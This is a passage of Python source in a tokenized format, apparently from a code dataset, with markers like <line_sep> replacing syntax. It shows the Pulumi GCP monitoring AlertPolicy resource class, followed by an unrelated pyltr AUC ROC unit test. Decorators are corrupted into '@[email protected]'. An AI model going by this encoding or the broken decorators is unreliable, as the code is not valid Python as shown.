duration="60s", filter="metric.type=\"compute.googleapis.com/instance/disk/write_bytes_count\" AND resource.type=\"gce_instance\"", ), display_name="test condition", )], display_name="My Alert Policy", user_labels={ "foo": "bar", }) ``` ## Import AlertPolicy can be imported using any of these accepted formats ```sh $ pulumi import gcp:monitoring/alertPolicy:AlertPolicy default {{name}} ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] combiner: How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]] conditions: A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. :param pulumi.Input[str] display_name: A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. :param pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']] documentation: Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. 
Notification channels that have limited capacity might not show this documentation. Structure is documented below. :param pulumi.Input[bool] enabled: Whether or not the policy is enabled. The default is true. :param pulumi.Input[Sequence[pulumi.Input[str]]] notification_channels: Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] user_labels: This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep><ellipsis><block_end>@overload<def_stmt>__init__ __self__ resource_name:str args:AlertPolicyArgs opts:Optional[pulumi.ResourceOptions]=<none><block_start>""" A description of the conditions under which some aspect of your system is considered to be "unhealthy" and the ways to notify people or services about this state. To get more information about AlertPolicy, see: * [API documentation](https://cloud.google.com/monitoring/api/ref_v3/rest/v3/projects.alertPolicies) * How-to Guides * [Official Documentation](https://cloud.google.com/monitoring/alerts/) ## Example Usage ### Monitoring Alert Policy Basic ```python import pulumi import pulumi_gcp as gcp alert_policy = gcp.monitoring.AlertPolicy("alertPolicy", combiner="OR", conditions=[gcp.monitoring.AlertPolicyConditionArgs( condition_threshold=gcp.monitoring.AlertPolicyConditionConditionThresholdArgs( aggregations=[gcp.monitoring.AlertPolicyConditionConditionThresholdAggregationArgs( alignment_period="60s", per_series_aligner="ALIGN_RATE", )], comparison="COMPARISON_GT", duration="60s", filter="metric.type=\"compute.googleapis.com/instance/disk/write_bytes_count\" AND resource.type=\"gce_instance\"", ), display_name="test condition", )], display_name="My Alert Policy", user_labels={ "foo": "bar", }) ``` ## Import AlertPolicy can be imported using any of these accepted formats ```sh $ pulumi import gcp:monitoring/alertPolicy:AlertPolicy default {{name}} ``` :param str resource_name: The name of the resource. :param AlertPolicyArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. 
"""<line_sep><ellipsis><block_end><def_stmt>__init__ __self__ resource_name:str *args **kwargs<block_start>resource_args,opts=_utilities.get_resource_args_opts(AlertPolicyArgs pulumi.ResourceOptions *args **kwargs)<if_stmt>resource_args<is><not><none><block_start>__self__._internal_init(resource_name opts **resource_args.__dict__)<block_end><else_stmt><block_start>__self__._internal_init(resource_name *args **kwargs)<block_end><block_end><def_stmt>_internal_init __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> combiner:Optional[pulumi.Input[str]]=<none> conditions:Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]]]=<none> display_name:Optional[pulumi.Input[str]]=<none> documentation:Optional[pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']]]=<none> enabled:Optional[pulumi.Input[bool]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str pulumi.Input[str]]]]=<none> __props__=<none><block_start><if_stmt>opts<is><none><block_start>opts=pulumi.ResourceOptions()<block_end><if_stmt><not>isinstance(opts pulumi.ResourceOptions)<block_start><raise>TypeError('Expected resource options to be a ResourceOptions instance')<block_end><if_stmt>opts.version<is><none><block_start>opts.version=_utilities.get_version()<block_end><if_stmt>opts.id<is><none><block_start><if_stmt>__props__<is><not><none><block_start><raise>TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')<block_end>__props__=AlertPolicyArgs.__new__(AlertPolicyArgs)<if_stmt>combiner<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'combiner'")<block_end>__props__.__dict__["combiner"]=combiner<if_stmt>conditions<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'conditions'")<block_end>__props__.__dict__["conditions"]=conditions<if_stmt>display_name<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'display_name'")<block_end>__props__.__dict__["display_name"]=display_name<line_sep>__props__.__dict__["documentation"]=documentation<line_sep>__props__.__dict__["enabled"]=enabled<line_sep>__props__.__dict__["notification_channels"]=notification_channels<line_sep>__props__.__dict__["project"]=project<line_sep>__props__.__dict__["user_labels"]=user_labels<line_sep>__props__.__dict__["creation_records"]=<none><line_sep>__props__.__dict__["name"]=<none><block_end>super(AlertPolicy __self__).__init__('gcp:monitoring/alertPolicy:AlertPolicy' resource_name __props__ opts)<block_end>@staticmethod<def_stmt>get resource_name:str id:pulumi.Input[str] opts:Optional[pulumi.ResourceOptions]=<none> combiner:Optional[pulumi.Input[str]]=<none> conditions:Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]]]=<none> creation_records:Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyCreationRecordArgs']]]]]=<none> display_name:Optional[pulumi.Input[str]]=<none> documentation:Optional[pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']]]=<none> enabled:Optional[pulumi.Input[bool]]=<none> name:Optional[pulumi.Input[str]]=<none> notification_channels:Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]=<none> project:Optional[pulumi.Input[str]]=<none> user_labels:Optional[pulumi.Input[Mapping[str 
pulumi.Input[str]]]]=<none><arrow>'AlertPolicy'<block_start>""" Get an existing AlertPolicy resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] combiner: How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyConditionArgs']]]] conditions: A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AlertPolicyCreationRecordArgs']]]] creation_records: A read-only record of the creation of the alerting policy. If provided in a call to create or update, this field will be ignored. :param pulumi.Input[str] display_name: A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. :param pulumi.Input[pulumi.InputType['AlertPolicyDocumentationArgs']] documentation: Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. :param pulumi.Input[bool] enabled: Whether or not the policy is enabled. The default is true. :param pulumi.Input[str] name: - The unique resource name for this condition. Its syntax is: projects/[PROJECT_ID]/alertPolicies/[POLICY_ID]/conditions/[CONDITION_ID] [CONDITION_ID] is assigned by Stackdriver Monitoring when the condition is created as part of a new or updated alerting policy. :param pulumi.Input[Sequence[pulumi.Input[str]]] notification_channels: Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it is not provided, the provider project is used. :param pulumi.Input[Mapping[str, pulumi.Input[str]]] user_labels: This field is intended to be used for organizing and identifying the AlertPolicy objects. The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter.
"""<line_sep>opts=pulumi.ResourceOptions.merge(opts pulumi.ResourceOptions(id=id))<line_sep>__props__=_AlertPolicyState.__new__(_AlertPolicyState)<line_sep>__props__.__dict__["combiner"]=combiner<line_sep>__props__.__dict__["conditions"]=conditions<line_sep>__props__.__dict__["creation_records"]=creation_records<line_sep>__props__.__dict__["display_name"]=display_name<line_sep>__props__.__dict__["documentation"]=documentation<line_sep>__props__.__dict__["enabled"]=enabled<line_sep>__props__.__dict__["name"]=name<line_sep>__props__.__dict__["notification_channels"]=notification_channels<line_sep>__props__.__dict__["project"]=project<line_sep>__props__.__dict__["user_labels"]=user_labels<line_sep><return>AlertPolicy(resource_name opts=opts __props__=__props__)<block_end>@[email protected]<def_stmt>combiner self<arrow>pulumi.Output[str]<block_start>""" How to combine the results of multiple conditions to determine if an incident should be opened. Possible values are `AND`, `OR`, and `AND_WITH_MATCHING_RESOURCE`. """<line_sep><return>pulumi.get(self "combiner")<block_end>@[email protected]<def_stmt>conditions self<arrow>pulumi.Output[Sequence['outputs.AlertPolicyCondition']]<block_start>""" A list of conditions for the policy. The conditions are combined by AND or OR according to the combiner field. If the combined conditions evaluate to true, then an incident is created. A policy can have from one to six conditions. Structure is documented below. """<line_sep><return>pulumi.get(self "conditions")<block_end>@[email protected](name="creationRecords")<def_stmt>creation_records self<arrow>pulumi.Output[Sequence['outputs.AlertPolicyCreationRecord']]<block_start>""" A read-only record of the creation of the alerting policy. If provided in a call to create or update, this field will be ignored. """<line_sep><return>pulumi.get(self "creation_records")<block_end>@[email protected](name="displayName")<def_stmt>display_name self<arrow>pulumi.Output[str]<block_start>""" A short name or phrase used to identify the condition in dashboards, notifications, and incidents. To avoid confusion, don't use the same display name for multiple conditions in the same policy. """<line_sep><return>pulumi.get(self "display_name")<block_end>@[email protected]<def_stmt>documentation self<arrow>pulumi.Output[Optional['outputs.AlertPolicyDocumentation']]<block_start>""" Documentation that is included with notifications and incidents related to this policy. Best practice is for the documentation to include information to help responders understand, mitigate, escalate, and correct the underlying problems detected by the alerting policy. Notification channels that have limited capacity might not show this documentation. Structure is documented below. """<line_sep><return>pulumi.get(self "documentation")<block_end>@[email protected]<def_stmt>enabled self<arrow>pulumi.Output[Optional[bool]]<block_start>""" Whether or not the policy is enabled. The default is true. """<line_sep><return>pulumi.get(self "enabled")<block_end>@[email protected]<def_stmt>name self<arrow>pulumi.Output[str]<block_start>""" - The unique resource name for this condition. Its syntax is: projects/[PROJECT_ID]/alertPolicies/[POLICY_ID]/conditions/[CONDITION_ID] [CONDITION_ID] is assigned by Stackdriver Monitoring when the condition is created as part of a new or updated alerting policy. 
"""<line_sep><return>pulumi.get(self "name")<block_end>@[email protected](name="notificationChannels")<def_stmt>notification_channels self<arrow>pulumi.Output[Optional[Sequence[str]]]<block_start>""" Identifies the notification channels to which notifications should be sent when incidents are opened or closed or when new violations occur on an already opened incident. Each element of this array corresponds to the name field in each of the NotificationChannel objects that are returned from the notificationChannels.list method. The syntax of the entries in this field is `projects/[PROJECT_ID]/notificationChannels/[CHANNEL_ID]` """<line_sep><return>pulumi.get(self "notification_channels")<block_end>@[email protected]<def_stmt>project self<arrow>pulumi.Output[str]<block_start>""" The ID of the project in which the resource belongs. If it is not provided, the provider project is used. """<line_sep><return>pulumi.get(self "project")<block_end>@[email protected](name="userLabels")<def_stmt>user_labels self<arrow>pulumi.Output[Optional[Mapping[str str]]]<block_start>""" This field is intended to be used for organizing and identifying the AlertPolicy objects.The field can contain up to 64 entries. Each key and value is limited to 63 Unicode characters or 128 bytes, whichever is smaller. Labels and values can contain only lowercase letters, numerals, underscores, and dashes. Keys must begin with a letter. """<line_sep><return>pulumi.get(self "user_labels")<block_end><block_end>
""" Testing for AUC ROC metric. """<import_from_stmt>. helpers<import_stmt>itertools<import_stmt>numpy<as>np<import_stmt>pyltr<import_stmt>sklearn.metrics<class_stmt>TestAUCROC(helpers.TestMetric)<block_start><def_stmt>get_metric self<block_start><return>pyltr.metrics.AUCROC()<block_end><def_stmt>get_queries_with_values self<block_start><for_stmt>i range(0 7)<block_start><for_stmt>tup itertools.product(*([(0 1)]<times>i))<block_start><if_stmt>any(e<ne>tup[0]<for>e tup)<block_start><yield>(np.array(tup) sklearn.metrics.roc_auc_score(tup range(i 0 -1)))<block_end><else_stmt><block_start><yield>np.array(tup) 0.0<block_end><block_end><block_end><block_end><def_stmt>get_queries self<block_start><for_stmt>i range(0 7)<block_start><for_stmt>tup itertools.product(*([(0 1)]<times>i))<block_start><yield>np.array(tup)<block_end><block_end><block_end><block_end>